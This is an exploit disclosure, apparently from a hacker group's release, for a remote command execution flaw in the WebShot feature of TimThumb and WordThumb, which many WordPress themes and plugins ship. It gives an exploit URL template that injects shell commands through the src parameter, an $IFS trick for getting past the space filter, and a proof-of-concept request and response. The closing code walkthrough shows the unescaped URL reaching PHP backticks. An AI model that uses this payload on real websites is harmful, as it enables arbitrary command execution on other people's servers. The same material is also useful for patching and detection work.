1 | We are... | |
2 | _____ _________ | |
3 | / _ \ ____ ____ ____ / _____/ ____ ____ | |
4 | / /_\ \ / \ / _ \ / \ \_____ \_/ __ \_/ ___\ | |
5 | / | \ | ( <_> ) | \/ \ ___/\ \___ | |
6 | \____|__ /___| /\____/|___| /_______ /\___ >\___ > | |
7 | \/ \/ \/ \/ \/ \/ | |
8 | //Laughing at your security since 2012* | |
9 | ================================================================================================= | |
10 | Official Members: Mrlele - AnonSec666 - 3r3b0s - 4prili666h05t - Hannaichi - ap3x h4x0r - d3f4ult | |
11 | ================================================================================================= | |
12 | ||
13 | _cant catch the rat... ~~(8:> | |
14 | ||
15 | ||
16 | ###################################################################### | |
17 | # _ ___ _ _ ____ ____ _ _____ | |
18 | # | | / _ \| \ | |/ ___|/ ___| / \|_ _| | |
19 | # | | | | | | \| | | _| | / _ \ | | | |
20 | # | |__| |_| | |\ | |_| | |___ / ___ \| | | |
21 | # |_____\___/|_| \_|\____|\____/_/ \_\_| | |
22 | # | |
23 | # Wordpress TimThumb 2.8.13 WebShot Remote Code Execution (0-day) | |
24 | # Affected website : a lot Wordpress Themes, Plugins, 3rd party components | |
25 | # Release dates : June 24, 2014 | |
26 | # | |
27 | # Special Thanks to 2600 Thailand group | |
28 | # : Xelenonz, anidear, windows98se, icheernoom, w4x0r, pistachio | |
29 | # https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/ | |
30 | # | |
31 | ######################################################################## | |
32 | ||
33 | [+] Description | |
34 | ============================================================ | |
35 | TimThumb is a small php script for cropping, zooming and resizing web | |
36 | images (jpg, png, gif). Perfect for use on blogs and other applications. | |
37 | Developed for use in the WordPress theme Mimbo Pro, and since used in many | |
38 | other WordPress themes. | |
39 | ||
40 | http://www.binarymoon.co.uk/projects/timthumb/ | |
41 | https://code.google.com/p/timthumb/ | |
42 | ||
43 | The original project WordThumb 1.07 is also vulnerable ( | |
44 | https://code.google.com/p/wordthumb/). | |
45 | They both share exactly the same WebShot code! And there are several | |
46 | projects that ship with "timthumb.php", such as, | |
47 | Wordpress Gallery Plugin | |
48 | https://wordpress.org/plugins/wordpress-gallery-plugin/ | |
49 | IGIT Posts Slider Widget | |
50 | http://wordpress.org/plugins/igit-posts-slider-widget/ | |
51 | ||
52 | All themes from http://themify.me/ contain a vulnerable "wordthumb" in | |
53 | "<theme-name>/themify/img.php". | |
54 | ||
55 | [+] Exploit | |
56 | ============================================================ | |
57 | http:// | |
58 | <wp-website>/wp-content/themes/<wp-theme>/path/to/timthumb.php?webshot=1&src=http:// | |
59 | <wp-website>$(<os-cmds>) | |
60 | ||
61 | ** Note that the OS command payload must consist only of characters from the following set: | |
62 | [A-Za-z0-9\-\.\_\~:\/\?\#\[\]\ () \!\$\&\'\(\)\*\+\,\;\=] | |
63 | ||
64 | ** Spaces, the pipe character and the greater-than sign are not allowed. | |
65 | ** This WebShot feature is DISABLED by default. | |
66 | ** CutyCapt and Xvfb must be installed at the paths given by the WEBSHOT_CUTYCAPT and WEBSHOT_XVFB constants. | |
67 | ||
68 | [+] Proof-of-Concept | |
69 | ============================================================ | |
70 | There are a couple of techniques that can be used to bypass the limited character set, but | |
71 | in this scenario I use the shell variable $IFS instead of a space. | |
72 | ||
73 | PoC Environment: | |
74 | Ubuntu 14.04 LTS | |
75 | PHP 5.5.9 | |
76 | Wordpress 3.9.1 | |
77 | Themify Parallax Theme 1.5.2 | |
78 | WordThumb 1.07 | |
79 | ||
80 | Crafted Exploit: | |
81 | http://loncatlab.local/wp-content/themes/parallax/themify/img.php?webshot=1&src=http://loncatlab.local/$(touch$IFS/tmp/longcat) | |
82 | ||
83 | GET /wp-content/themes/parallax/themify/img.php?webshot=1&src= | |
84 | http://longcatlab.local/$(touch$IFS/tmp/longcat) HTTP/1.1 | |
85 | Host: longcatlab.local | |
86 | Proxy-Connection: keep-alive | |
87 | Cache-Control: max-age=0 | |
88 | Accept: | |
89 | text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
90 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like | |
91 | Gecko) Chrome/35.0.1916.153 Safari/537.36 | |
92 | Accept-Encoding: gzip,deflate,sdch | |
93 | Accept-Language: en-US,en;q=0.8 | |
94 | Cookie: woocommerce_recently_viewed=9%7C12%7C16; | |
95 | wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; | |
96 | wp-settings-time-1=1403504538; themify-builder-tabs=query-portfoliot; | |
97 | wordpress_test_cookie=WP+Cookie+check; | |
98 | wordpress_logged_in_26775808be2a17b15cf43dfee3a681c9=moderator%7C1403747599%7C62244ce3918e23df1bd22450b3d78685 | |
99 | ||
100 | HTTP/1.1 400 Bad Request | |
101 | Date: Tue, 24 Jun 2014 07:20:48 GMT | |
102 | Server: Apache | |
103 | X-Powered-By: PHP/5.5.9-1ubuntu4 | |
104 | X-Content-Type-Options: nosniff | |
105 | X-Frame-Options: sameorigin | |
106 | Content-Length: 3059 | |
107 | Connection: close | |
108 | Content-Type: text/html | |
109 | ||
110 | … | |
111 | <a href='http://www.php.net/function.getimagesize' | |
112 | target='_new'>getimagesize</a> | |
113 | ( )</td><td | |
114 | title='/var/www/longcatlab.local/public_html/wp-content/themes/parallax/themify/img.php' | |
115 | bgcolor='#eeeeec'>../img.php<b>:</b>388</td></tr> | |
116 | </table></font> | |
117 | <h1>A WordThumb error has occured</h1>The following error(s) occured:<br | |
118 | /><ul><li>The image being resized is not a valid gif, jpg or | |
119 | png.</li></ul><br /><br />Query String : webshot=1&src= | |
120 | http://longcatlab.local/$(touch$IFS/tmp/longcat)<br />WordThumb version : | |
121 | 1.07</pre> | |
122 | ||
123 | Even though it responds with an error message, the injected OS command has already | |
124 | been executed. | |
125 | ||
126 | $ ls /tmp/longcat -lha | |
127 | - -rw-r--r-- 1 www-data www-data 0 มิ.ย. 24 14:20 /tmp/longcat | |
128 | ||
129 | ||
130 | [+] Vulnerability Analysis | |
131 | ============================================================ | |
132 | https://timthumb.googlecode.com/svn/trunk/timthumb.php | |
133 | ||
134 | Filename: timthumb.php | |
135 | ||
136 | if(! defined('WEBSHOT_ENABLED') ) define ('WEBSHOT_ENABLED', true); | |
137 | if(! defined('WEBSHOT_CUTYCAPT') ) define ('WEBSHOT_CUTYCAPT', | |
138 | '/usr/local/bin/CutyCapt'); | |
139 | if(! defined('WEBSHOT_XVFB') ) define ('WEBSHOT_XVFB', '/usr/bin/xvfb-run'); | |
140 | ... | |
141 | timthumb::start(); ← start script | |
142 | ... | |
143 | public static function start(){ | |
144 | $tim = new timthumb(); ← create timthumb object, call __construct() | |
145 | ... | |
146 | $tim->run(); | |
147 | ... | |
148 | public function __construct(){ | |
149 | ... | |
150 | $this->src = $this->param('src'); ← set "src" variable to HTTP GET "src" | |
151 | parameter | |
152 | … | |
153 | if(preg_match('/^https?:\/\/[^\/]+/i', $this->src)){ | |
154 | ... | |
155 | $this->isURL = true; ← prefix http/s result in isURL = true | |
156 | } | |
157 | ... | |
158 | ||
159 | protected function param($property, $default = ''){ | |
160 | if (isset ($_GET[$property])) { | |
161 | return $_GET[$property]; | |
162 | ... | |
163 | ||
164 | public function run(){ | |
165 | if($this->isURL){ | |
166 | ... | |
167 | if($this->param('webshot')){ ← HTTP GET "webshot" parameter must be submitted | |
168 | if(WEBSHOT_ENABLED){ ← this pre-defined constant must be true | |
169 | ... | |
170 | $this->serveWebshot(); ← call webshot feature | |
171 | } else { | |
172 | ... | |
173 | ||
174 | protected function serveWebshot(){ | |
175 | ... | |
176 | if(! is_file(WEBSHOT_CUTYCAPT)){ ← check that CutyCapt exists | |
177 | return $this->error("CutyCapt is not installed. $instr"); | |
178 | } | |
179 | if(! is_file(WEBSHOT_XVFB)){ ← check that Xvfb exists | |
180 | return $this->Error("Xvfb is not installed. $instr"); | |
181 | } | |
182 | ... | |
183 | $url = $this->src; | |
184 | if(! preg_match('/^https?:\/\/[a-zA-Z0-9\.\-]+/i', $url)){ ← check valid | |
185 | URL (only the scheme and host prefix is anchored; the rest of the string is not checked) #LoL | |
186 | return $this->error("Invalid URL supplied."); | |
187 | } | |
188 | $url = | |
189 | preg_replace('/[^A-Za-z0-9\-\.\_\~:\/\?\#\[\]\ () \!\$\&\'\(\)\*\+\,\;\=]+/', | |
190 | '', $url); ← strip characters outside the URL character set specified in RFC 3986 | |
191 | (http://www.ietf.org/rfc/rfc3986.txt); that set still allows the shell metacharacters $ ( ) ; and &, so this filter does not prevent injection | |
192 | ... | |
193 | if(WEBSHOT_XVFB_RUNNING){ | |
194 | putenv('DISPLAY=:100.0'); | |
195 | $command = "$cuty $proxy --max-wait=$timeout --user-agent=\"$ua\" | |
196 | --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn | |
197 | --js-can-open-windows=off --url=\"$url\" --out-format=$format | |
198 | --out=$tempfile"; ← OS shell command injection | |
199 | } else { | |
200 | $command = "$xv --server-args=\"-screen 0, | |
201 | {$screenX}x{$screenY}x{$colDepth}\" $cuty $proxy --max-wait=$timeout | |
202 | --user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn | |
203 | --js-can-open-windows=off --url=\"$url\" --out-format=$format | |
204 | --out=$tempfile"; ← OS shell command injection | |
205 | } | |
206 | ... | |
207 | $out = `$command`; ← execute $command as shell command | |
208 | ||
209 | "PHP supports one execution operator: backticks (``). Note that these are | |
210 | not single-quotes! PHP will attempt to execute the contents of the | |
211 | backticks as a shell command." - | |
212 | http://www.php.net//manual/en/language.operators.execution.php | |
213 | ||
214 | "$url" is interpolated into "$command" without any shell escaping (e.g. escapeshellarg()), so the shell evaluates the "$()" substitution, | |
215 | which results in arbitrary code execution. |